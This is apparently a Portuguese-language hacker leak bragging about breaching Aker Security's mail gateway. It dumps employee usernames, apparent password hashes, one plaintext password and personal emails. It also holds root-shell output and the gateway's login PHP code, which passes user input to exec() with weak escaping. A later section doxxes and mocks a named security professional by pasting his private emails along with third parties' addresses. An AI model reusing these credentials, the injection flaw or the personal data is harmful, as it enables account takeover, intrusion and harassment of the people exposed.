filipe.martins senha: lipe26 64ecb06c0e69747e karfield26@hotmail.com filipe.martins@aker.com.br 
vanessa.oliveira 02b3b9493a57b091  vanessa.oliveira@aker.com.br 
acf.carlos 759f5ed819769644 acf.carlos@yahoo.com.br  
rafaela.porto  rafaporto@gmail.com rafaela.porto@aker.com.br 
tiago.costa 4dcc7e3b55267c09 tiago.ventura@gmail.com  
igor.santos 750f2a74348c8972 ingonus@gmail.com  
leandro.teixeira  ltfeng@hotmail.com leandro.teixeira@aker.com.br 
caio.medina 760cd136609adb20 caio.medina@gmail.com caio.medina@aker.com.br 
simone.freitas 04826dcf54c3a938 simone29denovembro@hotmail.com simone.freitas@aker.com.br 
bernardo.rosa 25540b061d8351f3 bernardo.erre@gmail.com bernardo.rosa@aker.com.br 
vitor.ribeiro  vitorvfr@gmail.com  
thays.cristina 307941531d8ee635 araujo.thays@gmail.com  
gleiciane.costa 262becc40df68566 xandagarcia@bol.com.br gleiciane.costa@aker.com.br 
caio.silva  caio_tiery@hotmail.com  
luciana.silva    
julio.azevedo 010a04940b20c56a  julio.azevedo@aker.com.br 
victor.rossi 335d534e5e2b835b victor.rramirez@gmail.com victor.rossi@aker.com.br 
agata.oliveira 0cb8cba51f562c0a agatamoliveira@gmail.com  
antonio.osorio 1248b62f38fc791b afojur@gmail.com antonio.osorio@aker.com.br 
bruno.pereira 68c83eff66de31dc brunogereira@gmail.com  
marcus.lima 2e678e0c1e4efed9 mvcl07@yahoo.com.br marcus.lima@aker.com.br 
leonardo.queiroz 565491d704013245  leonardo.queiroz@aker.com.br 
lidia.silva 5f04a0ff167eb1ca lidiaalves85@gmail.com lidia.alves@aker.com.br 
marcelo.caldas 7751fde53bf81121 marcelo1512@uol.com.br marcelo.caldas@aker.com.br 
marcella.cibreir 68d6b05e304bbae2 cellacibreiros@gmail.com  
ricardo.costa  kadu49@gmail.com ricardo.costa@aker.com.br 
maria.aparecida    
maria.ceccon    
maria.ceccon 15bba3cf67b2755d mariaceccon@bd.com.br maria.ceccon@aker.com.br 
Rafael.quintino  rafquint@gmail.com  
marcus.ferreira  mqslevita@yahoo.com.br  
carlos.neves 79ac0b174d1a448a cenoredes@hotmail.com  
romulo.cacioli 7fac2ca469656281 cacioli@gmail.com romulo.cacioli@aker.com.br 
edson.ma 7fbc87456acea300 edsonma@gmail.com  
vitor.diniz 1b1487130867394e vitorhdiniz@gmail.com  
francisco.basagl 6000f47421d67f7e  francisco.basaglia@aker.com.br 
cleber.ribas 107bf1b50d581e75 cleber@top.com.br cleber.ribas@aker.com.br 
ivanilson.primo  ivanilsonprimo@gmail.com  



<====HACK====>

# uname -a
Linux asmg.aker.com.br 2.4.34.1 #8 Wed Mar 7 11:40:43 BRT 2007 i686 unknown


# --Shell script---
# Funcoes usadas pelos scripts do Aker Secure Mail Gateway

PATH_FORMAT_IF_PROBLEM="/conf/formatIfProblem"
PATH_STOP_SCRIPTS="/mnt/ramdisk/stopScripts"

hd_recover()
{
/sbin/sfdisk -q /dev/aker-flash-hd >/dev/null 2>&1 < /dev/null
   done
 fi

# Tenta retirar o modulo do fw
#MOD=`lsmod | grep aker_firewall_mod`
#if [ "X$MOD" != "X" ]; then
#  rmmod aker_firewall_mod
#fi

 for daemon in slattach sshd snmpd httpd ; do
   PROC=`ps ax | grep $daemon | cut -c 1-5`
   if [ "X$PROC" != "X" ] ; then
     kill $PROC 2> /dev/null
   fi
 done

 sleep 2

 # Mata o sshd
 for daemon in slattach sshd snmpd httpd; do
   PROC=`ps ax | grep $daemon | cut -c 1-5`
   if [ "X$PROC" != "X" ] ; then
     kill 9 $PROC 2> /dev/null
   fi
 done

 /etc/init.d/akav.sh stop
 /etc/init.d/akerurld.sh stop
 /etc/init.d/asm.sh stop

}

start_procs()
{
 echo -n "asmg...."
 /etc/init.d/aksecuremailgw start 1>/dev/null 2>/dev/null
 echo "ok"
 echo -n "sshd...."
 /etc/init.d/sshd start 1>/dev/null 2>/dev/null
 echo "ok"
 echo -n "akav...."
 /etc/init.d/akav.sh start 1>/dev/null 2>/dev/null
 echo "ok"
 echo -n "akerurld...."
 /etc/init.d/akerurld.sh start 1>/dev/null 2>/dev/null
 echo "ok"
 echo -n "asm...."
 /etc/init.d/asm.sh start 1>/dev/null 2>/dev/null
 echo "ok"
}

exit_error()
{
 echo "falhou."
 echo
 echo "Nao consegui restaurar as configuracoes de fabrica."
 echo "Por favor contate o suporte tecnico."
 echo
 echo "Pressione enter para finalizar a instalacao."
 read A
 exit 1
}

exit_error_en()
{
 echo "failed."
 echo
 echo "I could not restore factory default settings."
 echo "Please contact your technical support."
 echo
 echo "Press enter to finish instalation."
 read A
 exit 1
}



-rw-r--r--    1 akmaild  akmailgw    12589 Jul 15 03:24 /var/spool/akmailrepos/quarantine/010c384f0118a7a18dbead9b2f3f831b038e2661-6i.data
-rw-r--r--    1 akmaild  akmailgw     2399 Jul 16 15:06 /var/spool/akmailrepos/quarantine/019c02bef1175b7522feeaaf07e65ad8b52913a7-0i.data
-rw-r--r--    1 akmaild  akmailgw     3544 Jul 16 15:53 /var/spool/akmailrepos/quarantine/0201ade8afdf84539d0d9dcf8fbbe6d91eac7a48-0i.data
-rw-r--r--    1 akmaild  akmailgw    12570 Jul 15 00:52 /var/spool/akmailrepos/quarantine/028ada45502dc8967d53d9b2098ed5901f29c927-0i.data
-rw-r--r--    1 akmaild  akmailgw    33777 Jul 17 10:43 /var/spool/akmailrepos/quarantine/04dc4e414416938f10c9c64973a0b00b6f7a3ca4-2i.data
-rw-r--r--    1 akmaild  akmailgw    42048 Jul 16 07:06 /var/spool/akmailrepos/quarantine/050432c75d7a014c2b6a4b697cc85df82997e9ef-0i.data
-rw-r--r--    1 akmaild  akmailgw     3993 Jul 17 11:10 /var/spool/akmailrepos/quarantine/0574a207545bdbe59b75804dc3c95e3af11f5560-0i.data
-rw-r--r--    1 akmaild  akmailgw    70732 Jul 16 21:34 /var/spool/akmailrepos/quarantine/05f4d04193248f81edda4a7e570c45c6c6f3aedb-0i.data
-rw-r--r--    1 akmaild  akmailgw     7875 Jul 16 00:10 /var/spool/akmailrepos/quarantine/07b106b88cfcd33ecbc246761a267d1d672fda4c-0i.data
-rw-r--r--    1 akmaild  akmailgw     4885 Jul 17 10:38 /var/spool/akmailrepos/quarantine/08bce65fea80ce3c35f3108c49191c5509bf2f4c-0i.data
-rw-r--r--    1 akmaild  akmailgw     6574 Jul 15 16:58 /var/spool/akmailrepos/quarantine/09053edc314c8e73e2eaecaa99a8de26ee379c7d-0i.data
-rw-r--r--    1 akmaild  akmailgw     7387 Jul 16 21:13 /var/spool/akmailrepos/quarantine/09b4d34d8d56fc1de9bf58a2eca63313da9e0228-0i.data
-rw-r--r--    1 akmaild  akmailgw    41856 Jul 15 23:12 /var/spool/akmailrepos/quarantine/0a6c7bb3ecb1c92538a95c87f71841d5a548d16a-4i.data
-rw-r--r--    1 akmaild  akmailgw     3985 Jul 15 05:12 /var/spool/akmailrepos/quarantine/0b0a932086f5201ec5306de90e622e03e0ad1c90-4i.data
-rw-r--r--    1 akmaild  akmailgw    11063 Jul 14 12:48 /var/spool/akmailrepos/quarantine/0b51a500d9587d7a5db601637c418d0b361b9e99-6i.data
-rw-r--r--    1 akmaild  akmailgw     1183 Jul 14 20:20 /var/spool/akmailrepos/quarantine/0c1962011de390504a83ef4ac9fe83cb3df95336-0i.data
-rw-r--r--    1 akmaild  akmailgw     2370 Jul 16 09:31 /var/spool/akmailrepos/quarantine/0c23c6b7cb118e219be09875a3262be0e6bce9d2-0i.data
-rw-r--r--    1 akmaild  akmailgw     4930 Jul 16 14:47 /var/spool/akmailrepos/quarantine/22058348197d6d09ab2eb9ad72a45c8b229903f2-0i.data
-rw-r--r--    1 akmaild  akmailgw    20102 Jul 14 18:48 /var/spool/akmailrepos/quarantine/221ebea578be3fa38c7bba859d861954b62075c6-0i.data
-rw-r--r--    1 akmaild  akmailgw    48776 Jul 17 04:58 /var/spool/akmailrepos/quarantine/ef12d6ab029e970baa195c9fcfaf75cb1bd68429-0i.data
-rw-r--r--    1 akmaild  akmailgw    46121 Jul 16 01:03 /var/spool/akmailrepos/quarantine/f587a396797a64f84847e0bec29729e4a50c7ac0-0i.data
-rw-r--r--    1 akmaild  akmailgw     3489 Jul 16 11:34 /var/spool/akmailrepos/quarantine/f606ccdcd31f376a9bf8135a012179e070eb97f3-0i.data
-rw-r--r--    1 akmaild  akmailgw     4851 Jul 16 12:54 /var/spool/akmailrepos/quarantine/f6816abc9a4c1ac98b87bf971619a1a24a5129fc-0i.data
-rw-r--r--    1 akmaild  akmailgw     7685 Jul 15 21:24 /var/spool/akmailrepos/quarantine/f84f8b13020f0769c41e3ab74b886ffc076347e3-0i.data
-rw-r--r--    1 akmaild  akmailgw    46784 Jul 17 12:38 /var/spool/akmailrepos/quarantine/f875e92e9ad7660a1037eb5387cc581b4c14afa5-0i.data
-rw-r--r--    1 akmaild  akmailgw    43327 Jul 16 15:50 /var/spool/akmailrepos/quarantine/f87cbcb7014855d626b8065b01057b6ac1f99375-4i.data
-rw-r--r--    1 akmaild  akmailgw    37321 Jul 17 07:11 /var/spool/akmailrepos/quarantine/f8c6f967de3e26ab6ab436b92546f1d503de5db9-0i.data
-rw-r--r--    1 akmaild  akmailgw     1208 Jul 17 04:46 /var/spool/akmailrepos/quarantine/f8feeedf94b17c98400f1b0ea1040aa54ac46396-6i.data
-rw-r--r--    1 akmaild  akmailgw   140807 Jul 16 17:21 /var/spool/akmailrepos/quarantine/f9107a04b78be19c1fcf5593cb93487f57602c7e-0i.data
-rw-r--r--    1 akmaild  akmailgw     6040 Jul 16 21:09 /var/spool/akmailrepos/quarantine/f928d09b8be90a734356f36a652b22f60d6364f1-0i.data
-rw-r--r--    1 akmaild  akmailgw     7875 Jul 13 15:45 /var/spool/akmailrepos/quarantine/fa65cba9006f73080e60d629602be078d7187c90-4i.data
-rw-r--r--    1 akmaild  akmailgw    47921 Jul 16 13:28 /var/spool/akmailrepos/quarantine/fc13a29b3010481584855d007cf0c194ba0e9ccf-4i.data
-rw-r--r--    1 akmaild  akmailgw   248200 Jul 16 16:01 /var/spool/akmailrepos/quarantine/fd4b8922e809c76335431ab5fc15158853025351-0i.data
-rw-r--r--    1 akmaild  akmailgw     1167 Jul 17 07:14 /var/spool/akmailrepos/quarantine/fe558f5fdf26b4cbbbddc44221761d9f599a8b00-0i.data
-rw-r--r--    1 akmaild  akmailgw    12223 Jul 17 14:12 /var/spool/akmailrepos/quarantine/ff750134c9a4415ab45c1b0779a27ec1744fa241-0i.data
-rw-r--r--    1 akmaild  akmailgw     6676 Jul 15 15:04 /var/spool/akmailrepos/quarantine/ff850d0f171d724ac969db13e11f095d1e590b07-0i.data


$ ls -la /var/spool/var-tmp
-rw-r--r--    1 smg      smg       2574221 May 24 11:26 /var/spool/var-tmp/arquivosctis.tar.gz
-rw-r--r--    1 smg      smg       2673087 May 22 17:11 /var/spool/var-tmp/binarios.tar.gz
-rw-r--r--    1 smg      smg        268655 Jun 15 15:35 /var/spool/var-tmp/webgui.tar.gz

humMmmmm... b4ix4nd0 0s ArQuiv0s.......


$ ls -la /tmp/teste_usergui
total 64
drwxr-xr-x    5 akmaild  akmailgw     4096 Jun 15 15:37 .
drwxrwxrwx    9 akmaild  akmailgw    24576 Jul 21 04:29 ..
drwxr-xr-x    2 akmaild  akmailgw     4096 Jun 15 15:37 CVS
drwxr-xr-x    7 akmaild  akmailgw     4096 Jun 15 15:37 cf
-rw-rw-r--    1 akmaild  akmailgw      324 Feb 23  2005 index.php
-rw-rw-r--    1 akmaild  akmailgw    11982 May 25 14:59 smtpgw_preconf.dtd
-rw-rw-r--    1 akmaild  akmailgw     1483 Feb  8  2006 smtpgw_usrconf.dtd
-rw-rw-r--    1 akmaild  akmailgw     1951 Apr  4  2006 train.php
drwxr-xr-x   10 akmaild  akmailgw     4096 Jun 15 15:37 usergui



$ cat akauthenticator.php
server = $server;
                       $this->serverpasswd = $serverpasswd;
                       $this->user = $user;
                       $this->passwd = base64_decode($passwd);
                       //$this->passwd = escapeshellcmd($this->passwd);
                       $this->passwd = ereg_replace("\"", "\\\"", $this->passwd);
                       //$this->passwd = ereg_replace(" ", "\ ", $this->passwd);
                       //$this->passwd = ereg_replace(";", "\;", $this->passwd);
                       //$this->passwd = ereg_replace("&", "\"&\"", $this->passwd);
                       //$this->passwd = str_replace(")", "\)", $this->passwd);
                       //$this->passwd = str_replace("(", "\(", $this->passwd);
                       $this->binary = $binary;
               }

               function validate()
               {
                       //$command = $this->binary . " AUTHUSR " . $this->server . " " . $this->serverpasswd . " ".$this->user." ".$this->passwd . "";
     $enc_pwd = base64_encode($this->passwd);
                       $command = $this->binary . " "
                                               . "AUTHUSRCOD "
                                               . "\"{$this->server}\" "
                                               . "\"{$this->serverpasswd}\" "
                                               . "\"{$this->user}\" "
                                               . "\"{$enc_pwd}\"";

                       $return = array();
                       exec($command, $return, $return_code);

                       //echo "";
                       //echo "";
                       //echo "";

                       return(($return_code == '0') ? true : false);
               }
       }
?>

$ cat sysdefines.php


        * Copyright (C) 2004 Aker Security Solutions. All rights reserved.
        * This file is part of Aker SMTP Gateway
        */

       if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
       {
               //diretorio onde estao os executaveis 
               $bin_path = "C:\\program files\\Aker\\akmailgw\\";

               //declaracao da constante para substituir a variavel acima 
               if(!(defined('EXEC_PATH')))
               {
                       define('EXEC_PATH', "C:\\program files\\Aker\\akmailgw\\");
               }

               //declaracao da constante para o diretorio dos arquivos de configuracao 
               if(!(defined('CONF_PATH')))
               {
                       define('CONF_PATH', "C:\\program files\\Aker\\akmailgw\\conf\\");
               }
       }
       else
       {
               //diretorio onde estao os executaveis
               $bin_path = "env LD_LIBRARY_PATH=/usr/local/lib/qt-aker/lib/ /usr/local/akmailgw/";

               //declaracao da constante para substituir a variavel acima 
               if(!(defined('EXEC_PATH')))
               {
                       define('EXEC_PATH', "env LD_LIBRARY_PATH=/usr/local/lib/qt-aker/lib/ /usr/local/akmailgw/");
               }

               //declaracao da constante para o diretorio dos arquivos de configuracao 
               if(!(defined('CONF_PATH')))
               {
                       define('CONF_PATH', "/etc/aker/smtpgw/");
               }
       }
?>


$ echo "0wn3d"
0wn3d
$ cat login.php


        * @version 1.3, 31/03/2004
        */
       function verificarFormatoEmail($email)
       {
               $email = trim($email);

               if((strlen($email)) > 5)
               {
                       //verifica se existe um e apenas um caractere '@'
                       if(!(is_bool(strstr($email, '@'))))
                       {
                               if(strpos($email, '@') == strrpos($email, '@'))
                               {
                                       //separa o usuario e o dominio em duas variaveis
                                       list($usuario, $dominio) = split('@', $email, 2);

                                       //verifica se ha um tamanho minimo consideravel para $usuario e $dominio
                                       if(((strlen($usuario)) >= 1) && ((strlen($dominio)) >= 4))
                                       {
                                               //verifica se os caracteres sao validos para enderecos eletronicos
                                               //NOTA: Inexplicavelmente o PHP nao esta validando o '-' (hifen), por este motivo a validacao sera desabilitada
                                               //if((ereg("^[a-zA-Z0-9_\-\.]+$", $usuario)) && (ereg("^[a-zA-Z0-9\-\.]+$", $dominio)))
                                               //{
                                                       return(true);
                                               //}
                                       }
                               }
                       }
               }

               return(false);
       }//fim da funcao 'verificarFormatoEmail'

       /*****************************************************
                                       Efetua a autenticacao
       *****************************************************/

       if(isset($_POST['user']))
       {
           /*****************************************************
                                       Carrega lista de auths
               *****************************************************/

               //Inclui biblioteca para leitura e manipulacao do XML
               require('../lib/akxmlhandler.php');

               //Cria instancia e carrega o documento o documento XML para um array em JS
               $XML_source = new XMLHandler;
               $XML_source->xml_file = CONF_PATH . "smtpgw_preconf.xml";
               $XML_source->xml_dtd_file =  "../../smtpgw_preconf.dtd";
               $XML_source->getXML();
               $XML_source->getDTD();
               //$XML_source->js_array = "top.auths_xml";
               $miniXML = $XML_source->parseXML2PHPArray();
               $auths = $miniXML["AkerSMTPGatewayPreConf"]["entities"]["auths"];
               $domains = $miniXML["AkerSMTPGatewayPreConf"]["entities"]["domains"];
               $auths_domains = $miniXML["AkerSMTPGatewayPreConf"]["conf"]["domain_authenticators"];
               $confirm_domains = $miniXML["AkerSMTPGatewayPreConf"]["conf"]["confirmation"]["confirm_domains"];

               $_SESSION['lang'] = $_POST['guilanguage'];

               if(verificarFormatoEmail($_POST['user']))
               {
                       //Inclui biblioteca para autenticacao com authif
                       require('../lib/akauthenticator.php');

                       $atpos    = strpos($_POST['user'], "@");
                       $user     = substr($_POST['user'], 0, $atpos);
                       $domain   = substr($_POST['user'], $atpos+1);
                       $passwd   = $_POST['passwd'];
                       //$passwd   = addslashes(trim(base64_decode($_POST['passwd'])));


                       //verfica se he um alias com senha
                       $passwdDecode = base64_decode($_POST['passwd']);
                       $passwdDecode = ereg_replace("\"", "\\\"", $passwdDecode);

                       $command = EXEC_PATH . 'loginif 8 ' . $user . ' ' . $passwdDecode;

                       $return = array();
                       //echo "";
                       exec($command, $return, $return_code);
                       if($return_code == '0')
                       {
                               $_SESSION['logged'] = true;
                               $_SESSION['user'] = $user;
                               $_SESSION['domain'] = $domain;
                               //echo "";
                               echo "";
                               exit();
                       }

                       //verfica se he um ALIAS associado com usuario
                       $return = array();
                       $command = EXEC_PATH . 'loginif 10 ' . "\"{$user}\"";
                       //echo "";
                       exec($command, $return, $return_code);
                       $usingRelated = false;
                       if($return_code == '0')
                       {
                               //quarda o usuario retornado
                               $atpos    = strpos($return[0], "@");
                               $relatedUser = substr($return[0], 0, $atpos);
                               //echo "";
                               $search_domain = substr($return[0], $atpos+1);
                               //echo "";
                               $usingRelated = true;
                       }
                       else
                               $search_domain = $domain;


                       //echo "";
                       $user_domain = $domain;
                       $achou = FALSE;
                       for ($i = 0; $i < count($confirm_domains["confirm_domain"]); $i++)
                       {
                               $primary_domain_id = $confirm_domains["confirm_domain"][$i]["primary_domain"]["@data"];
                               $auth_id = $confirm_domains["confirm_domain"][$i]["domain_auth"]["@data"];

                               //echo "";
                               //echo "";
                               //echo "";
                               for ($j = 0; $j < count($domains["domain"]); $j++)
                               {
                                       $user_domain = $domains["domain"][$j]["domain_name"]["@data"];
                                       if ($primary_domain_id == $domains["domain"][$j]["id"]["@data"])
                                       {
                                               $real_domain = $user_domain;
                                               break;
                                       }
                               }

                               if (!($real_domain == $search_domain))
                               {
                                       for ($j = 0; $j < count($confirm_domains["confirm_domain"][$i]["related_domain"]); $j++)
                                       {
                                               $related_domain_id = $confirm_domains["confirm_domain"][$i]["related_domain"][$j]["@data"];
                                               //echo "";
                                               $achou = FALSE;
                                               for ($k = 0; $k < count($domains["domain"]); $k++)
                                               {
                                                       if ($related_domain_id == $domains["domain"][$k]["id"]["@data"])
                                                       {
                                                               $real_domain = $domains["domain"][$k]["domain_name"]["@data"];
                                                               $achou = TRUE;
                                                               break;
                                                       }
                                               }
                                               if (($achou) && ($real_domain == $search_domain))
                                                       break;
                                       }

                               }

                               $achou = FALSE;
                               if ($real_domain == $search_domain)
                               {
                                       //echo "";
                                       //echo "";
                                       for ($j = 0; $j < count($auths["auth"]); $j++)
                                       {
                                               if ($auth_id == $auths["auth"][$j]["id"]["@data"])
                                               {
                                                       $server = $auths["auth"][$j]["ip"]["@data"];
                                                       $serverpasswd = $auths["auth"][$j]["pwd"]["@data"];
                                                       $achou = TRUE;
                                                       break;
                                               }
                                       }
                               }

                               if ($achou)
                                       break;
                       }

                       if (!($achou))
                       {
                               for($i=0; $i < count($auths_domains["domain_authenticator"]); $i++)
                               {
                                       $auth_domain_id = $auths_domains["domain_authenticator"][$i]["@"]["domain_id"];
                                       $auth_id = $auths_domains["domain_authenticator"][$i]["@data"];

                                       for($j=0; $j < count($domains["domain"]); $j++)
                                       {
                                               if($auth_domain_id == $domains["domain"][$j]["id"]["@data"])
                                               {
                                                       $real_domain = $domains["domain"][$j]["domain_name"]["@data"];
                                               }
                                       }
                                       if($real_domain == $search_domain)
                                       {
                                               $user_domain = $real_domain;
                                               for($j=0; $j < count($auths["auth"]); $j++)
                                               {
                                                       if($auth_id == $auths["auth"][$j]["id"]["@data"])
                                                       {
                                                               $server = $auths["auth"][$j]["ip"]["@data"];
                                                               $serverpasswd = $auths["auth"][$j]["pwd"]["@data"];
                                                       }
                                               }
                                       }
                               }
                       }

                       $binary = EXEC_PATH . "authif";

                       //verificar se autenticador eh case sensitive ou nao

                       $command = $binary . " "
                       . "AUTHCASESENS "
                       . "\"{$server}\" "
                       . "\"{$serverpasswd}\" ";
                       $return = array();
                       $return_code = 20;
                       exec($command, $return, $return_code);
                       if ($return_code != 20) //nao eh case sensitive
                       {
                               if ($usingRelated)
                                       $relatedUser = strtolower($relatedUser);
                               else
                                       $user = strtolower($user);
                       }

               //      echo "";
                       if ($usingRelated)
                               $check = new AkAuthenticator($server, $serverpasswd, $relatedUser, $passwd, $binary);
                       else
                               $check = new AkAuthenticator($server, $serverpasswd, $user, $passwd, $binary);

                       if($check->validate())
                       {
                               $_SESSION['logged'] = true;
                               $_SESSION['user'] = $user;
                               $_SESSION['domain'] = $user_domain;
                               //echo "";
                               echo "";
                               exit();
                       }

               }

               $_SESSION['logged'] = false;

               switch($_SESSION['lang'])
               {
                   case 'PT_BR':
                     $msg = 'Usuario e/ou senha invalidos!';
                     break;
                   default:
                     $msg = 'Wrong login and/or password';
               }

               echo "";
       }
?>


";
 //  echo "
"; //} //else //{ //echo ""; echo ""; //} ?> a essa altura fragola já deve estar pagando passagem hUHAEaheauhEAUhe :D:D:D:D ----------------------------------------------------------------------------------------- 3; lifestyle of the owneds and lamests: Augusto Paes de Barros ----------------------------------------------------------------------------------------- Augusto Quadro Paes de Barros, pr0f1ss10n4l dE seGur4nÇa hÁ UNS 10 anos, CISSP d3sd3 2000, v3nc3D0r do PRêM10 "A nata dos profissionais de segurança" p0r D0is An0s C0ns3Cut1v0s, p4lEsTr4nTE da BlackHat Europa, um D0s CSO m4is f4m0s0s do PaíS, mesTR3 em SeGuranÇa pelo IPT e r3c3nTem3ntE s3 muD4nd0 pARa 0 CaN4dá (n0ss4 cÉlul4 c4n4Dense jÁ eStÁ eM al3rTa). D3 Qu3 ADi4nTa tUd0 isS0 Qu4nd0 Se É 0wn4d0 f0rT3m3nTe? T0d4 4 RePuT4çã0 QUE vc C0nsTru1u v4i p3l0 Ral0 d3 uM4 h0r4 pR4 0uTr4. Ok ok, t0d0s p0d3m s3R 0wnAdos, c0nc0rDa? M4s É iNADiM1sSÍV3l s3r h4ck3Ad0 d3STa F0rm4 rid1cul4m3nt3 fÁc1l. Aqu1 v4i um4 diC4, Augusto: nã0 R3us3 su4s sEnh4s em 1000 sit3s diFeRent3s, iNclu1nd0 s3u e-M4il, MSN, LinkedIN, etc. Nós s0mOs Ét1c0s 0 b4St4nTe paR4 não DiVUlg4r InF0rmaÇõEs s0br3 sEus cl1EnT3s. Est4m0s t3nTAnd0 anD4r n4 L1nh4 dA Ét1c4 pAr4 p0d3r Tir4r CISSP n0 Fin4l d0 an0 :DDDD Nas n0it3s N0 fr10 cAn4D3nsE lemBr3-SE s3mprE de NóS, Augusto. Est4m0s t0rC3nd0 p0r v0Cê ;) obs: Qu3Rí4m0s dAr um4 Volt1nh4 no S3u R3n4ult Clio ant3s d3 ser venD1do :( S3m m4is d3l0ng4s, H3r3 w3 g0 ag4in <============ EMAILZ apbarros@hotmail.com ==================> FW: Auditores CISSP From: Augusto Paes de Barros (apbarros@hotmail.com) Sent: Thursday, October 25, 2007 11:45:58 AM To: augusto@paesdebarros.com.br > Date: Mon, 15 Oct 2007 18:20:07 -0300 > From: antonmarcelo@gmail.com > To: apbarros@hotmail.com > Subject: Auditores CISSP > > Augusto, > > Estou fazendo a avaliação para uma auditoria de uma grande empresa, na > área de segurança de informação e procuro profissionais no Rio ou São > Paulo com certificação CISSP, BS7799 e MCSO, para proposta de 1 ano de > projeto. Vi seu blog e vi que você preencheria estas condições. > Preciso de mais 2 profissionais, lhe interessaria ou você poderia me > indicar alguém, no Rio ou SP. Meu telefone de contato é > xxx-21-93654272 > > Cordialmente, > > Antonio Marcelo === comentário: Antonio Marcelo (oldm) da bufferoverflow.org honeypot-br e eScr1t0r d4quEles L1vr0s b0st4s? Ess3 C4Ra é Um4 C0mÉD14 d0 C4R4lh0 L4m3r m4ld1t0!!!! RE: Qual a sua árvore? From: Augusto Paes de Barros (apbarros@hotmail.com) Sent: Wednesday, November 07, 2007 10:30:59 AM To: carla reis (carlareispinto@hotmail.com) Carla, eu recebo toneladas de mensagens suas, mas não te conheço! Acho que você pegou o e-mail errado, por favor, retire-me da sua lista. Parece que é um grupo de pós-graduação, pois acho que alguns de seus colegas também mandaram mensagens para o mesmo grupo... Grato, Augusto > From: carlareispinto@hotmail.com > Subject: FW: Fwd: Qual a sua árvore? > Date: Wed, 7 Nov 2007 12:22:45 +0000 > > > Carla T. Reis > > >From: "jorge miguel" > >To: alramalheiro@iol.pt, b.seixo@hotmail.com, carlareispinto@hotmail.com, > >joanaandrade79@hotmail.com, joanatorres80@hotmail.com, > >joaomonteirobebe@hotmail.com, joaoramalheiro@mail.telepac.pt, > >luis.sansana@hotmail.com, vl_ma@hotmail.com, vpatriciareis@hotmail.com, > >tyxa_88@hotmail.com, ylda.maria@hotmail.com > >Subject: FW: Fwd: Qual a sua árvore? > >Date: Mon, 05 Nov 2007 22:38:35 +0000 > > > > > > > > > >>From: "sonia jose" > >>To: ana_filipa82@hotmail.com, catiaamaral@hotmail.com, > >>hardcorerikko@vodafone.pt, iifm_20@hotmail.com, m.marqyez@hotmail.com, > >>alex.pelixo@sapo.pt, silvio_andre_80@hotmail.com, suzika_34@hotmail.com > >>Subject: FW: Fwd: Qual a sua árvore? > >>Date: Mon, 05 Nov 2007 15:10:37 +0000 > >> > >> > >> > >> > >>>From: Célia Gonçalves > >>>To: acristina.mestre@hotmail.com, cegonho.elsa@hotmail.com, > >>>cris2909_6@hotmail.com, liliana_cardoso84@hotmail.com, > >>>martaclaudina1980@hotmail.com, soniajose.1981@hotmail.com > >>>Subject: FW: Fwd: Qual a sua árvore? > >>>Date: Mon, 29 Oct 2007 21:35:24 +0000 > >>> > >>>Célia Gonçalves > >>> > >>> > >>>From: "celia goncalves" > >>>To: celiamariagoncalves@hotmail.com > >>>Subject: Fwd: Qual a sua árvore? > >>>Date: Mon, 29 Oct 2007 21:33:35 +0000 > >>> Gilson, eu não sou o/a "apbarros" que vc imagina, favor tirar meu nome da sua lista de e-mail. grato, Augusto From: senseigilson@hotmail.com To: sivonei@coopercarga.com.br; rodrigo6xas@hotmail.com; ribeirovn_224@hotmail.com; rafael.macedo@hospitalcostantini.com.br; phjudo@hotmail.com; paulaloreani@hotmail.com; mnjesus@terra.com.br; michelle.goncalves@hotmail.com; luciane-amorim@hotmail.com; lemanczuk@judolemanczuk.com.br; judoveiga@gmail.com; judotonietto@hotmail.com; invbueno@hotmail.com; gdal_col@yahoo.com.br; furlan@mpsinf.com.br; maria.sipoli@utp.br; michelleomota@yahoo.com.br; danicaetano@usp.br; apbarros@hotmail.com; mariatereza2004@msn.com; car.renato@hotmail.com; v9pb@hotmail.com; kaikadestre@hotmail.com; rafael_karioka@hotmail.com; marcio_jess@yahoo.com.br; harry_avilateles@hotmail.com; joaozuca@hotmail.com; aureliosantosmariano@hotmail.com; fernandomanosso@hotmail.com; paulorick87@hotmail.com; calrin10@yahoo.com.br; marcius_v@hotmail.com; josefms17@hotmail.com; banzaigt@hotmail.com; breisk@hotmail.com; kaiut@hotmail.com; alexandre@twaproducoes.com.br; hugo.ferrante@terra.com.br; joselinoindio@hotmail.com; a_ricklijr@hotmail.com; rofalvo@hotmail.com; dariocintra@hotmail.com; fisio_kaka@hotmail.com; mndbm@hotmail.com; buiu_jj@hotmail.com Subject: FW: Hosp. Erasto Gaertner - urgente Date: Fri, 16 Nov 2007 21:18:21 +0300 Amigos (as) O hospital Erasto Gaertner está precisando de doações de leite em pó para o setor de pediatria. O estoque de latas está no fim e as crianças que lutam contra o câncer não podem ficar sem o alimento. Serve qualquer marca. Os interessados em fazer a boa ação podem ligar para 3266-9303/3361-5000, ou entregar diretamente no hospital. Favor repassar aos seus contatos Obrigado Bom fim de semana RE: Taco Hoje! From: Augusto Paes de Barros (apbarros@hotmail.com) Sent: Wednesday, April 30, 2008 10:14:19 AM To: Sali Teixeira de Freitas (sfreitas@timsul.com.br); marcia@wises.com.br; neiva.s@gmail.com; Neiva Scharnoveber (neiva.scharnoveber@electrolux.com.br); tamara.santos@meucarronovo.com.br; larismf@hotmail.com Attachments: Security scan upon download Trend Micro ® logo image002.jpg (1.0 KB) "Meninas", o apbarros@hotmail.com não é de uma de vocês, acho que todas anotaram errado e vivo recebendo mensagens para ela. Por favor, corrijam seus address books. Ah, e eu odeeeeeeeeeio a TIM!!!! :-) Grato, Augusto RE: Taco Hoje! From: Augusto Paes de Barros (apbarros@hotmail.com) Sent: Wednesday, April 30, 2008 10:48:57 AM To: Neiva Scharnoveber (neiva.scharnoveber@electrolux.com.br) Cc: Sali Teixeira de Freitas (sfreitas@timsul.com.br); tamara.santos@meucarronovo.com.br Bom, menos ruim do que de homens, com certeza :-) A TIM tem o pior serviço de atendimento que já vi e nos horários de pico aqui em São Paulo a rede fica sobrecarregada e nenhum celular TIM funciona. Triste. E como você é de Desenvolvimento é bom dar uma chamada nos caras do atendimento! Afinal, segundo eles, a culpa é sempre do "sistema"! Sem stress pessoal, só peço para atualizarem os endereços. Grato, Augusto Contato - Orlando Tuzzolo From: otuzzolo (otuzzolo@uol.com.br) Medium risk You may not know this sender. Mark as safe | Mark as unsafe Sent: Wednesday, April 02, 2008 3:03:37 PM To: apbarros (apbarros@hotmail.com) Attachments: Security scan upon download Trend Micro ® logo CV-Orland...doc (60.6 